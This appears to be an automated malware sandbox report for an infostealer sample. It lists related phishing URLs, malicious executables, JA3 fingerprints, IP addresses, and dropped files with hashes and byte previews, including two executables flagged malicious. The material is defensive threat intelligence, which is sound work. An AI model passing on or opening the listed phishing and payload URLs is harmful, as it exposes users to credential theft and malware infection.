	https://link.trustpilot.com/ls/click?upn=u001.j-2BMD1rpUvfXVasz-2BUEF8v0gLqESYoH9OAOsEpvf5KFmayNUiIMUjOj-2F6xodjiwswXbJ5_rTIZcwdFQl8UVV0MQoqEOCgBw9W2jwyOcNXSjRnCSMzbe6L3Ws0d2debfLDgpXs6CwbIbJZZu0mJQCWbk0Mk14nO-2BxU9-2Blvuk1zQgy1VNRLMg1mRxfI5Q1Of5KhvuoPcWQXwBfEAkkr-2Bvt3Og4Y94IbOhDED0tzgJSAB1f90rFx1hm7V7-2F8MmLwvZJdulRBMTVbBzixYtMU1elLHm4R6vA-3D-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==	Get hash	malicious	Unknown	Browse	104.26.4.39
	https://solvetherecaptcha404.webflow.io/404	Get hash	malicious	Unknown	Browse	104.18.160.117
	Daniel Leblanc shared _Incendie Hudson._ with you. #12.eml	Get hash	malicious	Unknown	Browse	104.16.117.116
CLOUDFLARENETUS	ECChG5eWfZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	https://netorgft2387211-my.sharepoint.com/:f:/g/personal/ben_generocityfoundation_com/EhzZ9tSokRNAoBEY50LGbOQBIYOddYigPFrRDcIpJLfA2w?e=t5itWH	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://justandbest.de	Get hash	malicious	Unknown	Browse	172.67.171.50
	https://docs.zoom.us/doc/c63Sae4RQ6OyTcxmh_zLzw?from=email&data=05%7C02%7CRyan.Deiter@americansignature.com%7Ce3b8b957491b4e36dfd108dcde65b619%7C5c02e89ab9684d4e960de62c7cd02766%7C0%7C0%7C638629775655136517%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=RMvLQDF1y92hR5HKChbiO0e0aKONAOKzPjDkQ4i5MTY=&reserved=0	Get hash	malicious	Unknown	Browse	172.64.151.101
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	172.67.208.139
	CLQD.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	172.67.208.139
	https://link.trustpilot.com/ls/click?upn=u001.j-2BMD1rpUvfXVasz-2BUEF8v0gLqESYoH9OAOsEpvf5KFmayNUiIMUjOj-2F6xodjiwswXbJ5_rTIZcwdFQl8UVV0MQoqEOCgBw9W2jwyOcNXSjRnCSMzbe6L3Ws0d2debfLDgpXs6CwbIbJZZu0mJQCWbk0Mk14nO-2BxU9-2Blvuk1zQgy1VNRLMg1mRxfI5Q1Of5KhvuoPcWQXwBfEAkkr-2Bvt3Og4Y94IbOhDED0tzgJSAB1f90rFx1hm7V7-2F8MmLwvZJdulRBMTVbBzixYtMU1elLHm4R6vA-3D-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==	Get hash	malicious	Unknown	Browse	104.26.4.39
	https://solvetherecaptcha404.webflow.io/404	Get hash	malicious	Unknown	Browse	104.18.160.117
	Daniel Leblanc shared _Incendie Hudson._ with you. #12.eml	Get hash	malicious	Unknown	Browse	104.16.117.116
AKAMAI-ASN1EU	https://netorgft2387211-my.sharepoint.com/:f:/g/personal/ben_generocityfoundation_com/EhzZ9tSokRNAoBEY50LGbOQBIYOddYigPFrRDcIpJLfA2w?e=t5itWH	Get hash	malicious	HTMLPhisher	Browse	2.22.242.64
	https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3B	Get hash	malicious	Unknown	Browse	104.124.11.146
	https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylink	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	2.16.238.149
	https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylink	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	2.16.238.149
	https://fub.direct/1/-vWjF5-zkXOO9FYu1PvcR9oL_v9wxWQugIahU1Sumip1aJEFjv7arGFxl8RwHXdse9Zqfr-Geb0wD7JwZstmrogxBkr93dacZn8BO2DpKYk/https/goncalvesalexandre.com/g63f/5876983556/Marlpar/#?email=amhAbWFybHBhci5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.80.224.173
	https://www.google.to/url?url=https://bxaxlsoggszcwwbz&nzc=vvjpqcc&suvkdk=cmz&kwdec=vutety&cbb=sslsceg&pagnn=fuhmpw&dkqf=mwwhastk&ffmvozjupo=yqbyougxxo&q=amp/gm5bqhj.g%C2%ADb%C2%ADe%C2%ADym%C2%ADw%C2%ADc%C2%ADg%C2%ADv%C2%ADk%C2%ADb%C2%ADd%C2%ADevll.com%E2%80%8B/cbvogermm&clnw=xokmakg&dhxrdhh=zgwr&tievm=savxww&gfpizxn=fnv	Get hash	malicious	HTMLPhisher	Browse	172.232.30.92
	https://forms.office.com/e/jUjy5zj0tM	Get hash	malicious	HTMLPhisher	Browse	80.67.82.187
	https://storage.googleapis.com/inbound-mail-attachments-prod/0cbecb77-b573-4b3b-8c97-8b461d262d51?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1758806989&Signature=teNXGJRcW9uuEoVVvD0bLb%2BTGBorxpSu89OlgLR0AZpo8aoMl3JFsBDoXmLnj9QMk%2BAPu8iGsKTPrT4i0XSxxzRmtCLdsbDi23%2FFHfN4OpU3mOnUXtbZ81e7h5Ax%2FIygnxvogL7iGUXrqQUBZEnVkPmXcpAMmBTX7%2Bj4kVf57xBQo4WA9yGdv5Df4b9nDGZMXEYZVxWjPtOk4%2FXapMoV5bYJLgpB%2BR%2F1LUE0IwT1d3wuv1q6TONtaWwducy4mc1%2FJvGqxFuxuW9Y6Ojq%2B7a%2FqCW4DaFdd42O6ViY63C8G7dPbTe9LtxhwHcAk9xg3n5kXh2Z75tDAkK2Ak5mKneP6g%3D%3D	Get hash	malicious	Unknown	Browse	88.221.110.227
	https://aac4b0887827b3598989c48a201d0420.crimachado.com.br/wehrgiwfbfeifef/djbfhokefbwuwrjow/djhfeokhrwihfekljd/bnpheWVkaUBzdGMuY29tLnNh	Get hash	malicious	HTMLPhisher	Browse	95.101.148.20
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	2.16.100.168

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
a0e9f5d64349fb13191bc781f81f42e1	Baylor financial-RemittanceSeptember 26, 2024_-YTRKOKQTQALJDQKMPCNJ.xlsx	Get hash	malicious	Unknown	Browse	104.21.4.136 188.114.97.3 23.197.127.21 188.114.96.3 104.21.2.13 104.21.58.182
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 23.197.127.21 188.114.96.3 104.21.2.13 104.21.58.182
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 23.197.127.21 188.114.96.3 104.21.2.13 104.21.58.182
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136 188.114.97.3 23.197.127.21 188.114.96.3 104.21.2.13 104.21.58.182
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136 188.114.97.3 23.197.127.21 188.114.96.3 104.21.2.13 104.21.58.182
	http://google.com	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 23.197.127.21 188.114.96.3 104.21.2.13 104.21.58.182
	https://finalstepgo.com/uploads/il2.txt	Get hash	malicious	LummaC	Browse	104.21.4.136 188.114.97.3 23.197.127.21 188.114.96.3 104.21.2.13 104.21.58.182
	https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH	Get hash	malicious	Unknown	Browse	104.21.4.136 188.114.97.3 23.197.127.21 188.114.96.3 104.21.2.13 104.21.58.182
	0.dll	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	104.21.4.136 188.114.97.3 23.197.127.21 188.114.96.3 104.21.2.13 104.21.58.182
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254 172.105.54.160
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254 172.105.54.160
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254 172.105.54.160
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254 172.105.54.160
	file.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 172.105.54.160
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.102.49.254 172.105.54.160
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.102.49.254 172.105.54.160
	Payment copy.vbs	Get hash	malicious	FormBook, GuLoader	Browse	104.102.49.254 172.105.54.160
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 172.105.54.160
	PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbe	Get hash	malicious	GuLoader, Lokibot	Browse	104.102.49.254 172.105.54.160

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\KJEHJKJEBG.exe	file.exe	Get hash	malicious	LummaC, Vidar	Browse
C:\ProgramData\KJEHJKJEBG.exe	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
C:\ProgramData\CBFBKFIDHI.exe	file.exe	Get hash	malicious	LummaC, Vidar	Browse
C:\ProgramData\CBFBKFIDHI.exe	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BAECFHJEBAAF\BKECBA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAECFHJEBAAF\EBAFBG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\BAECFHJEBAAF\EHCAEG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAECFHJEBAAF\GDGHID

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAECFHJEBAAF\GDGHID-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAECFHJEBAAF\GHJJDG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAECFHJEBAAF\HDGDGH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAECFHJEBAAF\HDGDGH-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAECFHJEBAAF\HIDAAK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAECFHJEBAAF\IEHJJE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BAECFHJEBAAF\KFIJEG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBFBKFIDHI.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.988110023083548
Encrypted:	false
SSDEEP:	6144:CQuuGQX/FN5CVU03+wwybsDV3Sdmq2r5tmsz2ViLEO:vui9N5iQ5p3Sd0TmsTEO
MD5:	16F5B27C9E1376C17B03BF8C5090DB3C
SHA1:	676145AB7CA93E0463B931E6A056804B8F42119E
SHA-256:	7952E7769A991C349CC092B9CB3D1505405E793B526F49C784C343DD7D3CD227
SHA-512:	23FE6E23E80257469C09BA68B2C78EE6B3C03700E8173EFF4E2CA94964AD3AB8F2B0CB20DD01E483BF6B7D8DE1138BC946CEBBA6BEC10D78E7CCEC6DC0C3CB5E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................M.b.K..K.9~h.w....G).2..X..u.........&...W...`.r..I.z-@..W....y...x..e...g.O....f.&..~.vV.\...yM<..V&..z..B.).....y..-....g.*E..!T9.z...M..."...A...#..V..kj#.2....)........:r...-9\..hK<....f3u.xX....T.....+Q:.......T....X.i.v7.....Q.9vq. .M.r0..}k.t5J!..1.e..U..;....;..z.9_Y.T3?k%..L.6M....;.P.5W.'0....V.T,9wl..y....]....sj:y..k.4.$.".o.9.V+.@Re3Y..(...:.K.O#..L..X%.u..`&.1&..X{.

C:\ProgramData\DBGHJEBKJEGH\GDBFHD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBGHJEBKJEGH\GHDBKJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJEHJKJEBG.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.988867781346718
Encrypted:	false
SSDEEP:	6144:O+0dGgr04h1LBuTmcYz43wUDPNvms5PYYzX3oYbEU6DsV4+1/QSyiZEO:30d/h1LBK13wUjx5QYTo0EUBVSS/EO
MD5:	2CCE29D734EA1D227B338834698E2DE4
SHA1:	41700CD1BCF5F5BCCA81CE722ED47FC17BD030C2
SHA-256:	F75ACF936390F89239C43552717EFB65C4C3190B16A7EEC62DCD0053A045E91D
SHA-512:	EA0B440113A225764B38AE2526A10F7E4F3081E4A353E9831CF0E846AC7BA97EA7C2B4A12AB6FAC5708A7855DA8967F1B6BC661757DC68D819D11887A6AF20B5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
